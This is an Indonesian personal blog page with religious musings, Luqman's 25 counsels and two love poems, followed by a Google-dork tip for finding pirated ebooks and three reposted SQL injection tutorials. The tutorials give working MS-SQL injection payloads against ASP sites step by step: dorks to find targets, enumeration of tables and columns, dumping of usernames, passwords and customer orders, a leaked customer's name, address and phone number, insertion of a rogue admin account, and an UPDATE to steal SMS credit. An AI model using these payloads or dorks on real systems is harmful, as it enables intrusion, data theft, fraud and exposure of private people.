Subscribe News Feed Subscribe Comments

Lakune Ilmu Kudu ketemu

Lakune Ilmu Kudu ketemu
Adalah istilah jawa yang kalau di translate ke bahasa indonesia kurang lebih artinya "Jalannya ilmu harus ketemu", maksudnya kemanapun ilmu itu harus kita kejar supaya kita mendapatkannya. Jadi ilmu itu harus kita kejar walaupun jauh tempatnya. Sebab dengan ilmu semua akan mudah. Pekerjaan yang tidak dilandasi oleh ilmu maka hasilnya akan berantakan, tidak tersusun secara rapi. Lalu apa kehebatan ilmu...?
"Ilmu Itu Dapat Menjaga Pemiliknya, Sedangkan Harta hanya minta dijaga pemiliknya" Begitulah kata pepatah. kenapa ilmu disebut bisa menjaga pemiliknya. Misalnya kita memiliki ilmu berenang, saat kita naik kapal ditengah laut dan tiba-tiba kapal yang kita tumpangi tenggelam, lalu samakah orang yang punya ilmu berenang dengan yang tidak..? Pastinya tidak sama, orang yang punya ilmu berenang InsyaAlloh dapat selamat dengan ilmu yang dimilikinya, sedangkan orang yang tidak punya ilmu berenang pasti akan kesulitan, meskipun akhirnya selamat. Wallohu'alam kalau masalah kematian memang sudah ditangan Alloh. Tapi paling tidak ilmu renang dapat menjaga seorang yang memilikinya disaat dibutuhkan.
Berbeda dengan harta yang hanya minta dijaga pemiliknya, coba kita kalau punya motor pasti motor kita akan selalu kita jaga. Misalnya motor kita mau dicuri orang, pasti kita akan melawan bukan..? dan setelah diambil orang maka benda pasti akan hilang. Berbeda dengan ilmu yang meskipun diambil sana sini oleh orang banyak, insyaAlloh kita masih memilikinya, malahan ilmu itu bisa bermanfaat kalau kita amalkan kepada orang lain. Dan malah akan bertambah.
Jadi pesan Rasulullah SAW. "Carilah Ilmu Walau Sampai Negeri Cina" itu harus kita lakukan. sama seperti halnya dengan "Lakune Ilmu Kudu ketemu".



Selengkapnya...

25 Pesan Luqmanul Hakim

  1. .. Hai anakku: ketahuilah, sesungguhnya dunia ini bagaikan lautan yang dalam, banyak manusia yang karam ke dalamnya. Bila engkau ingin selamat, agar jangan karam, layarilah lautan itu dengan SAMPAN yang bernama TAKWA, ISInya ialah IMAN dan LAYARnya adalah TAWAKKAL kepada ALLAH.
  2. .. Orang - orang yg sentiasa menyediakan dirinya untuk menerima nasihat, maka dirinya akan mendapat penjagaan dari ALLAH. Orang yang insyaf dan sadar setalah menerima nasihat orang lain, dia akan sentiasa menerima kemulian dari ALLAH juga.
  3. .. Hai anakku; orang yang merasa dirinya hina dan rendah diri dalam beribadat dan taat kepada ALLAH, maka dia tawadduk kepada ALLAH, dia akan lebih dekat kepada ALLAH dan selalu berusaha menghindarkan maksiat kepada ALLAH.
  4. .. Hai anakku; seandainya ibu bapamu marah kepadamu kerana kesilapan yang dilakukanmu, maka marahnya ibu bapamu adalah bagaikan baja bagi tanam tanaman.
  5. .. Jauhkan dirimu dari berhutang, karena sesungguhnya berhutang itu boleh menjadikan dirimu hina di waktu siang dan gelisah di waktu malam.
  6. .. Dan selalulah berharap kepada ALLAH tentang sesuatu yang menyebabkan untuk tidak menderhakai ALLAH. Takutlah kepada ALLAH dengan sebenar benar takut ( takwa ), tentulah engkau akan terlepas dari sifat berputus asa dari rahmat ALLAH.
  7. .. Hai anakku; seorang pendusta akan lekas hilang air mukanya karena tidak dipercayai orang dan seorang yang telah rusak akhlaknya akan sentiasa banyak melamunkan hal hal yang tidak benar. Ketahuilah, memindahkan batu besar dari tempatnya semula itu lebih mudah daripada memberi pengertian kepada orang yang tidak mau mengerti.
  8. .. Hai anakku; engkau telah merasakan betapa beratnya mengangkat batu besar dan besi yang amat berat, tetapi akan lebih berat lagi daripada semua itu, adalah bilamana engkau mempunyai tetangga yang jahat.
  9. .. Hai anakku; janganlah engkau mengirimkan orang yg bodoh sebagai utusan. Maka bila tidak ada orang yang cerdik, sebaiknya dirimulah saja yang layak menjadi utusan.
  10. .. Jauhilah bersifat dusta, sebab dusta itu mudah dilakukan, bagaikan memakan daging burung, padahal sedikit saja berdusta itu telah memberikan akibat yang berbahaya.
  11. .. Hai anakku; bila engkau mempunyai dua pilihan, takziah orang mati atau hadir majlis perkarwinan, pilihlah untuk menziarahi orang mati, sebab ianya akan mengingatkanmu kepada kampung akhirat sedang kan menghadiri pesta perkarwinan hanya mengingatkan dirimu kepada kesenangan duniawi saja.
  12. .. Janganlah engkau makan sampai kenyang yang berlebihan, karena sesungguhnya makan yang terlalu kenyang itu adalah lebih baiknya bila makanan itu diberikan kepada anjing saja.
  13. .. Hai anakku; janganlah engkau langsung menelan saja karena manisnya barang dan janganlah langsung memuntahkan saja pahitnya sesuatu barang itu, kerana manis belum tentu menimbulkan kesegaran dan pahit itu belum tentu menimbulkan kesengsaraan.
  14. .. Makanlah makananmu bersama sama dengan orang orang yang takwa dan musyawarahlah urusanmu dengan para alim ulama dengan cara meminta nasihat dari mereka.
  15. .. Hai anakku; bukanlah satu kebaikan namanya bilamana engkau selalu mencari ilmu tetapi engkau tidak pernah mengamalkannya. Hal itu tidak ubah bagaikan orang yg mencari kayu bakar, maka setelah banyak ia tidak mampu memikulnya, padahal ia masih mau menambahkannya.
  16. .. Hai anakku; bilamana engkau mau mencari kawan sejati, maka ujilah terlebih dahulu dengan berpura pura membuat dia marah. Bilamana dalam kemarahan itu dia masih berusaha menginsyafkan kamu, maka bolehlah engkau mengambil dia sebagai kawan. Bila tidak demikian, maka berhati hatilah.
  17. .. Selalulah baik tutur kata dan halus budi bahasamu serta manis wajahmu, dengan demikian engkau akan disukai orang melebihi sukanya seseorang terhadap orang lain yang pernah memberikan barang yang berharga.
  18. .. Hai anakku; bila engkau berteman, tempatkanlah dirimu padanya sebagai orang yang tidak mengharapkan sesuatu daripadanya. Namun biarkanlah dia yang mengharapkan sesuatu darimu.
  19. .. Jadikanlah dirimu dalam segala tingkah laku sebagai orang yang tidak ingin menerima pujian atau mengharap sanjungan orang lain karena itu adalah sifat riya' yang akan mendatangkan cela pada dirimu.
  20. .. Hai anakku; janganlah engkau condong kepada urusan dunia dan hatimu selalu disusahkan olah dunia saja karena engkau diciptakan ALLAH bukanlah untuk dunia saja. Sesungguhnya tiada makhluk yang lebih hina daripada orang yang terpedaya dengan dunianya.
  21. .. Hai anakku; usahakanlah agar mulutmu jangan mengeluarkan kata kata yang busuk dan kotor serta kasar, karena engkau akan lebih selamat bila berdiam diri. Kalau berbicara, usahakanlah agar bicaramu mendatangkan manfaat bagi orang lain.
  22. .. Hai anakku; janganlah engkau mudah ketawa kalau bukan karena sesuatu yang menggelikan, janganlah engkau berjalan tanpa tujuan yang pasti, janganlah engkau bertanya sesuatu yang tidak ada guna bagimu, janganlah mensia-siakan hartamu.
  23. .. Barang siapa yang penyayang tentu akan disayangi, siapa yang pendiam akan selamat daripada berkata yang mengandungi racun, dan siapa yang tidak dapat menahan lidahnya dari berkata kotor tentu akan menyesal.
  24. .. Hai anakku; bergaullah rapat dengan orang yang alim lagi berilmu. Perhatikanlah kata nasihatnya karena sesungguhnya sejuklah hati ini mendengarkan nasihatnya, hiduplah hati ini dengan cahaya hikmah dari mutiara kata katanya bagaikan tanah yang subur lalu disirami air hujan.
  25. .. Hai anakku; ambillah harta dunia sekedar keperluanmu saja, dan nafkahkanlah yang selebihnya untuk bekal akhiratmu. Jangan engkau tendang dunia ini ke keranjang atau bakul sampah karena nanti engkau akan menjadi pengemis yang membuat beban orang lain. Sebaliknya janganlah engkau peluk dunia ini serta meneguk habis airnya karena sesungguhnya yang engkau makan dan pakai itu adalah tanah belaka. Janganlah engkau bertemankan dengan orang yang bersifat dua muka, kelak akan membinasakan dirimu.
Selengkapnya...

Using Google for searching ebooks

Google has some fantastic potential for you to find whatever you are after on the internet.

To search for a book / program / file perhaps try the following.

Go to Google's search page and use the following criteria in the search dialog

intitle:index.of? file extension Name of item

e.g. intitle:index.of? chm syngress

This will hopefully give you a listing of all websites that google has cached that contain references to files in CHM format that are published by SYNGRESS.

---------------
I use in Google

+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +syngress

or

allinurl: +(rar|chm|zip|pdf|tgz) Syngress
Enjoy


Selengkapnya...

Kembalikan Aku ke Masa Lalu

Jikalau Harus Memilih
Aku Akan Memilih
Tapi Sayang Waktu dak Bisa Diputar
Seperti Dalam Film Lorong Waktu

Jikalau Harus Memilih
Aku Kan Memilih Kembali Hidup Pada Masa Kecil
Yang Mana Saat Itu Tak Mengenal Arti Dari Cinta
Yang Kukenal Hanya Bersenang-senang Dengan Teman-teman


Namun Setelah Kumengerti Tentang Cinta
Hidupku Semakin Tak menentu
Kadang Semangat Menjalani Hidup Dapat Membara Dengan Cinta
Tak Jarang Semangat Menurun Drastis Karena Cinta

Wahai Dzat Yang Membolak-Balikkan Hati
Tetapkanlah Hatiku Pada Jalan-Mu
Sehingga Aku Berjalan Dengan Ridho-Mu
Dan Pasti Aku dapat Melalui Rintangan Seberat Apapun Dengan Seizin-Mu...

Jika Aku Bisa memilih
Aku Kan Kembali Ke Masa Lalu
Dan Akan Tumbuh Berkembang Sampai Dewasa
Tanpa Mengenal Cinta
Sampai Pada Akhirnya Cinta Yang Datang Menjemputku
Dengan Halus Dan Tanpa Melukai Sedikitpun....
Selengkapnya...

Kasih Sayang Yang Terlewatkan

Disaat Aku Mulai Rapuh menjalani Hidup Ini
Kau Datang Dengan membawa Secercah Harapan Untukku
Sampai Akhirnya Kerapuhanku Sedikit Sedikit Mulai Tertutupi
Dan Kau Pun Terus Memberikan Aku Semangat Dalam Menjalani Hidup Ini

Ketika Aku Sudah Terlanjur Menyayangimu Dengan Sepenuh Hati
Tanpa Mengharapkan Balasan Kasih Sayang Darimu
Dan Tak Bermaksud Pula Ingin Memasuki kehidupanmu Yang Kau Jalani
Serta Tak Bermaksud Membuatmu Agar Menyayangiku


Yang Kuingin Adalah Ku Bisa Dekat Denganmu
Dimanapun Engkau Berada
Karena Jika Dekat Denganmu Hatiku Akan Terasa Tenang
Dan Jiwaku Pun Akan Terasa Damai

Tapi Entah mengapa...
Engkau Malah Semakin Menjauh Dariku
Seakan Engkau Tak mau Lagi Walau Hanya Berteman Denganku
Dirimu Seperti Tak Ingin Berada Dekat Denganku
Dan Akupun Berusaha Mencari Tahu Apakah Sebabnya
Tapi Kau Tak Pernah Mau Berbicara Denganku

Mungkin Inilah Yang Dinamakan Takdir
Kau Datang Dan Mungkin Sebentar Lagi Akan Pergi Meninggalkanku
Dengan Segala Kenangan Yang Aku Miliki
Dan Segala Masa Lalu Kelam mu Bersamaku

Tapi Sungguh Aku Tak Mengharapkan Apa-apa Darimu
Meskipun Hanya Setitik Cintamu Padaku
Aku Tak Pernah Berfikir Mengharapkan Seperti Itu
Yang Ku Ingin Hanya Ku Dapat Dekat Denganmu Dan Menjagamu Sepenuh Hatiku

Sampai Akhirnya Aku Tak Mampu Lagi Menjagamu.......
Selengkapnya...

SQL Injection 3

berikut adalah lanjutan dari v.2 Sql Injection dimana kesemuanya hanya berpengaruh pada mesin yg menjalankan web ASP + MS-SQL ....

dan inget penulis tidak bertanggung jawab atas segala kemungkinan yg terjadi hehehe

Target sample : http://www.xxx/qshop/details.asp?prodid=93

The Process :

  1. cari tau vulner atau engga dengan cara menambahkan single quote ato having 1=1—

Contoh : http://www.xxx/qshop/details.asp?prodid=93’ atau http://www.xxx/qshop/details.asp?prodid=93 having 1=1--

  1. kalau errornya MS-SQL bla bla bla berarti vulner, selain itu tidak vulner.

Contoh dari hasil di atas :

http://www.xxx/qshop/details.asp?prodid=93

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/qshop/details.asp, line 23

  1. hasil di atas itu menandakan web sample kita itu vulner, dan langkah selanjutnya adalah mencari tau struktur databasenya…..Database terdiri dari table n field. Field apa, table apa?....Field itu kolom2 yg memuat data2 dari input, n Table itu gabungan dari field2 yg sama. Dalam database ada primary key dalam setiap tablenya. (CMIIW)
  2. Gmn cari taunya? Rumus buat nyari table structure n fields :

Cari Table :

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20

table_name%20not%20in%20(‘x')))--sp_password

X didalam tanda kurung itu adalah nama table yg akan keluar dan di insert lagi. Penjelasannya ada dibawah

Cari Field :

%20or%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=

('X')%20and%20column_name%20not%20in%20('Y')))--sp_password

X itu nama tablenya

Y itu nama fieldnya

  1. udah tau rumusnya? Ok INGET itu rumus….mulai kita hajar web sample. Kita tambahin having di akhiran VALUEnya….jadi :

http://www.xxx/qshop/details.asp?prodid=93%20having%201=1--


en keluar errornya :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'products.Id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/qshop/details.asp, line 23

OK dari error itu kita tau ada table dengan nama Product dan di dalam table product ada field ID.

  1. ok, kita cari table dengan isi yg kita inginkan.....how? inget rumus di atas....

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20

in%20(‘x')))--sp_password

Sekarang X kita ganti dengan Products. Jadinya

%20or%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name

%20not%20in%20('Products')))--sp_password

Trus kita masukin rumus itu di belakang value products

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20not%20in%20('Products')))--sp_password

and keluar error :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Carts' to a column of data type int.

/qshop/details.asp, line 23

Nah ada lagi table dengan nama Carts…got it…cari trus sampe abis….kita tambahin aja value x-nya, jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20not%20in%20('Products','Carts')))--sp_password

abis itu bakal keluar error dengan nama table yg laen…..masukin trus nama2 table itu kyk contoh di atas. Masukin terus sampe errornya gak ada ato errornya beda.

Akhirannya jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20table_name%20from%20

information_schema.tables%20where%20table_name%20not%20in%20('carts','Categories','CommonList','Config_Table','dbstatus',

'dtproperties','Historic','OrderLines','Orders','Products','Status','sysconstraints','syssegments','test','Users')))--sp_password

  1. OK semua struktur tablenya kita tau,,,,,ada table orders….kl menurut logika cc itu berarti disimpen di table orders….ok kita cari tau table orders punya field apa aja?...Inget rumus field di atas? Klo gak inget minum mizone dolO!

%20or%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name

=('X')%20and%20column_name%20not%20in%20('Y')))--sp_password

X kita ganti dengan nama table yg akan kita cari field2nya….jadi kita ganti Orders

Y kita kosongin aja dolo tar jg keluar field pertamanya.....jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('')))--sp_password

errornya jadi :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Id' to a column of data type int.

/qshop/details.asp, line 23

Nah ID itu adalah field pertama dari table orders, artinya kita dapet nilai Y....selanjutnya kita ganti Y jadi ID menjadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('Id')))--sp_password

nah tar terus keluar error yg sama persis kyk waktu kita ngeluarin struktur table…trus masukin lagi field2 table order ke dalam nilai Y sampe errornya gak ada lagi atao beda jadi :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('Orders')%20and%20column_name%20not%20in%20('Id','UserID','CartID','Date',

'Name','Surname','Country2','Address','CP','City','Province','Country','Phone','mail','DName','DAddress','DCP','DCity','DProvince',

'DActualCountry','DPhone','PaymentMode','SubTotal','Delivery','Total','Status')))--sp_password

  1. OK, struktur table n field dah tau…sekarang gmn caranya kita bisa ngambil nilai dari database? Dalam contoh ini kita ambil info dari database tanpa masuk ke admin. RUMUS lagi :

%20or%201=convert(int,(select%20top%201%20convert(varchar,isnull(convert(varchar,%20Y1),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Y),'NULL'))% 20from%20X%20where%20Y1%20not%20in%20('Z')))--sp_password

Ok Y1 itu nilai Primary Key, contoh primary key itu ID, OrderID, UserID dll….

Y itu Field lainnya dalam table yg akan di keluarin nilai fieldnya.

X itu Table Name yg akan di ambil data2nya

Z itu nilai dari Y1 bisa jadi 0,1,2,3,4…dst;….

Contoh dari sample :

http://www.xxx/qshop/details.asp?prodid=93%20or%201=convert(int,(select%20top%201%20convert(varchar,isnull(convert(varchar,%20id),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20date),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20UserID),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Name),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Surname),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Address),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20CP),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20City),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Province),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Country),'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20Phone),

'NULL'))%2b'/'%2bconvert(varchar,isnull(convert(varchar,%20mail),'NULL'))%20from%20orders%20where%20id%20not%20in%20('2918')

%20order%20by%20id%20desc))--sp_password

darimana dapet nilai value Y1 ? masukin aja asal dulu misalkan 0, nanti di error yg akan keluar dikasih liat nilai Valuenya, biasanya di awal contoh :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '3011/Dec 23 2006 2:19PM/L9180ER/Britain/Brady/The Department of Politics, Un/YO10 5DD/York/Please Select/UK/07939086210/ brady.britain@gmail.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it / ' to a column of data type int.

/qshop/details.asp, line 23

3011 itu nilai dari Primary Key atau Y1…..

Selesai….sql injection gak Cuma berefek di MS-SQL tapi jg di semua SQL…Cuma metodenya beda2….tunggu saja rilisan berikutnya ;)

sumber : http://www.neoteker.or.id/info-security/60-sql-injection-v3.html

Selengkapnya...

SQL Injection 2

:::PREFACE::.
============
Kalau di Vol.1 dah dibahas teknik UPDATE di MS-SQL maka disini gw jelasin cara INSERT dan UNION......rada ngejelimet neh.....makanya kalau baca artikel ini harus ada aer putih hyuehueh.... N disini gw juga akan kasih kilas balik sedikit untuk yang baru nyoba2 :) n penjelasan yang lebih detail

.::BODY::.
============

Sebelumnya tolong apabila browser kalian pada pake IE setting dulu browsernya agar bisa melihat errornya. Setting di Tools-Internet option-Advanced tab-Show friendly HTTP error messages. itu musti dilakukan, kalau tidak kalian tidak bisa lihat error messages yg keluar nanti.
OK, masih inget kan cara cari targetnya? kalau lupa lihat lagi artikel Vol.1 :)

Nah, klo dah dapet targetnya sekarang tinggal input SQL Querynya di input boxnya :


www.target.com/ login.asp >> contoh target
www.target.com/ login.asp? err=Invalid_ password >> persan error yang dapat di eksploitasi seperti biasa kalau ingin cari n tes vuln engganya tuh situs kita ketikan ' having 1=1-- di input box atau URL error tadi , contoh : www.target.com/ login.asp? err=' having 1=1-- then,....

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserID' is invalid in the select list because it is
not
contained in an
aggregate function and there is no GROUP BY clause

itu error messagesnya, kini kita group field UserID dari table Users, stringnya : ' group by UserID --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.ClientName' is invalid in the select list
because it is not contained in either an aggregate function or the
GROUP BY clause.

muncul lagi error seperti itu....lalu lagi kita Group. Kini stringnya adalah ' group by field1,field2 --
contoh : ' group by UserID,ClientName --

then,...

Microsoft OLE DB Provider for SQL Server (0x80040E14)
Column 'Users.UserName' is invalid in the select list because it is
not
contained in

either an aggregate function or the GROUP BY clause.
trus group by lagi, hal ini kita lakukan (proses looping) sampai semua field kita

ketahui..... .makanya harus sabar, kalau engga ga bakal tembus :) apabila sudah lama melakukan looping dan akhirnya ketika group terakhir kita lakukan dan tidak keluar error messagesnya maka error yang terakhir adalah field yg terakhir.... .field table itu bisa panjang
sekali, tergantung admin yang masangnya jadi susah kalau maen teabk2an ajah....contoh field yang pernah gw temuin :
' group by UserID,ClientName, UserName, Password, PhysicalAddress, PhoneNumber, Email
, OperatingSystem, PrefferredGraphi cFormat -- >> ada 9 field!!! jangan males dalam proses Looping :P

setelah dapet semua field, kini yang kita lakukan adalah mencari siapa aja user yang ada dalam table Users dan kolom UserName... caranya? kita pake Union apa itu UNION??? union adalah perintah SQL dimana ia dapat menggabungkan dua SELECT list tapi kalau pengen gunain Union ini kita harus tahu ada berapa field dalam table tadi

sintaksnya gini :
select field1, field2, … field_n
from tables
UNION
select field1, field2, … field_n
from tables;

nah biasanya dalam SQL QUERY di input box username itu mereka bikin
query select * from

Users where UserName =='"+login+" ' and Password='"+ pass"'"; nah kalau begitu kita masukin syntax sql union untuk melihat username :
' union select min(UserName) ,1,1,1 from Users where username > 'a'-- jadi hasilnya : select * from Users where UserName ==' union select min(UserName) ,1,1,1 from Users where username > 'a'--and Password='"+ pass"'"; gitu kiranya, jadi nanti akan muncul error messages lagi yang akan menampilkan sebuah username lebih dari huruf a ,contoh:

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Agile' to a column of
data
type int. /

tuh lihat kan ada user dengan nama Agile...lalu looping lagi pake string union tadi nanti akan muncul username2 lain....lalu bagaimana dengan passwordnya? ??
ok union beraksi kembali : ' union select min (UserName),1, 1,1,1,1,1, 1,1 from Users where username > 'Agile'-- lalu akan muncul error yang memberitahukan passwordnya, contoh :

Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Syntax error converting the varchar value 'Surfer' to a column of
data
type int. /

kalau dah gini kita bisa masuk dengan Username Agile dan passwordnya Surfer...hehehe

selamat yah!
btw, kita juga ingin dong bisa INSERT databasenya. .... caranya : karena ktia sudah tahu field2nya maka stringnya jadi : '
insert into table values
(field1,field2, ....,field_ n)--
misalkan ada field sebagai berikut :
'Users.UserID'
'Users. Username'
'Users.Password'
'Users.FName'
'Users.LName'
'Users.EmailAddress '
'Users.Administrato r'
itu berarti ada 7 field! Ok kita masukan menurut string tadi : '
insert
into Users values

(0,'lucifer' ,'lucifer' ,'lu','cid' ,' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it ',1)-- >> artinya kita masukan id kita dalam urutan 0, lalu username 'lucifer', password 'lucifer' Fname (frontName) itu 'lu', Lname(LastName) sebagai 'cid', dan EmailAddress ' a@a.com This e-mail address is being protected from spambots. You need JavaScript enabled to view it '...... coba kita login dengan user buatan kita tadi....BINGO! selamat anda berhasil menjebol database situs

sumber : http://www.neoteker.or.id/info-security/58-sql-injection-vol2.html


Selengkapnya...

SQL Injection 1

Setelah banyaknya bug-bug yang bertebaran di jagad maya ini dari yang namanya Unicode (masih ada lho sekarang) , RPC DCOM, XSS, VP-ASP, dan bug-bug e-commerce lainnya kini yang lagi "trend" dalamteknik hacking adlaah SQL Injection. dalam vol. 1 ini gw jelasin cara ngisi sesuatu dengan perintah UPDATE

::DESCRIPTION: :
============ ===
SQL adalah bahasa pemrograman database yang banyak dipakai dalam website, laporan keuangan, data-data pekerjaan, data mahasiswa, dan lain lain. Diantara jenis lainnya MS-SQL adalah yang paling terkenal, nah ternyata semua hal yang di jagad maya ini adalah Vulnerable terhadap berbagai serangan, jadi SQL pun menjadi target dalam hal ini.

::VULN::
========
yang akan gw bahas disini adalah MS-SQL yang Link ODBC dengan bahasa pemrograman website ASP.

::Injection: :
==========
ok, setelah basa basi diatas gw mulai neh ..hehehe untuk menginject sql ini anda perlu memperhatikan input-inputan dalam situs itu yang sekiranya connect dengan SQL database situs itu, atau bisa juga dengan menambah dari link url di kotak browser anda semisal : ....asp/productID= 1'[sql query/string. untuk mencari target yang vuln seperti kondisi diatas anda perlu mencarinya yang .asp nah seperti biasa....GOOGLING! !! hehehe key wordnya di google adalah :

1. allinurl:.co. id/login. asp
2. allinurl:.com/ admin.asp

semuannya itu banyak kombinasinya lainnya itu tergantung seberapa jauh anda kreatif dalam mencari target di google.nah, kanre disini gw bahas cara inject ke situs web to sms so searchnya : asp,web to sms atw Send SMS, ASP

ok, misal kita dapet target www.apes.com, nah lihat dah ada inputan yang masuk ke database itu ga, misalnya search product, member login, atw admin login :) setelah itu kita isa inject pake
sql "umum" stringnya : ' or 1=1-- disini kita lihat kalau 1=1 itu nialinya true dan tanda -- itu adalah marknya SQL kalau di C++/C itu // _/* jadi setelah tanda Mark perintah selanjutnya tidak dijalankan. nah klo beruntung dapet /admin.asp kita inject seperti diatas itu bisa lho kita masuk sebagai admin! ini terjadi di situs berita nasional di indonesia...

nah, klo ga dapet dir adminya yah kita cari kotak input yang kiranya connect ke database situs itu, contoh isa di login, member, search, dll. kita masukan debugging codenya : ' having 1=1--
jreeeeeng... ..ini musti diinget n kudu di pake setiap klo mo inject, kita injet di :

userid : ' having 1=1--
Password :fuzk3

lalu....jreeeeeeng. ...ERROR! !!!
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userid' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

tuh ketahuan ada kolom UserDB.userid, klo udah gini gemana lagi dungs? ok kita loop lagi sekarang kita inject : ' group by UserDB.userid -- atau ' group by UserDB.userid having 1=1-- disini kita gunain perintah group by untuk menggroup kolom ingin kita lihat....ehehe. ..muncul error lagi, kali ini beda choi...
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ ODBC SQL Server Driver][SQL Server]
Column 'UserDB.userpass' is invalid in the select list because it is
not contained in an aggregate function and there is no GROUP BY
clause.
member/log_right. asp, line 25

nah sekarang kita tau apa aja kolomnya...hehehe penerapan selanjutanya adalah misal situs itu adalah situs pengiriman SMS sedunia yang kalo kita membernya kita bisa send sms dari web, namun harus ada account yang digunakan untuk mengirim sms itu, jadi account itu harus ada nilainya dan untuk itu kita harus mengisinya dengan cara membelinya.. .ok ok NO CARDING HERE!!!
heheheh...so gemana neh??? karena kita ini orang-orang kere hehehe so kita inject aja....sebelumnya kita harus jadi member kan gratis ini daftarnya... setelah kita jadi member dengan id : fuzk3 dan pass: Vero...kita log ke situs itu dengan id kita, cari tahu string khusus yang digunakan web itu untuk menghitung account sms kita, misalnya : cell nah, inilah injectnya... .cari login inputan lagi misal /member.asp nah disitu ada input box id dan pass...kita Inject dengan :

' UPDATE [namadatabase] SET [charkhusus] = [nilai] WHERE [namakolom]= '[char_id]'- -

contoh :

' UPDATE UserDb set cell=100 where userid ='fuzk3'-- (inget neh)

sep, nah klo muncul error : userid not found kita isa cari input di forgot password : dengan inputan sama...jreeen ketika di jalankan ga ada error apa-apa..kembali login lalu...jreeeeeenng. ..liha cell mu itu waduh 100 cell enak neh sms seratus kali....kiekiekie. ..SUKSES BRO!!! :)

sumber : http://www.neoteker.or.id/info-security/59-sql-injection-vol1.html
Selengkapnya...

 
Lakune Ilmu Kudu Ketemu | TNB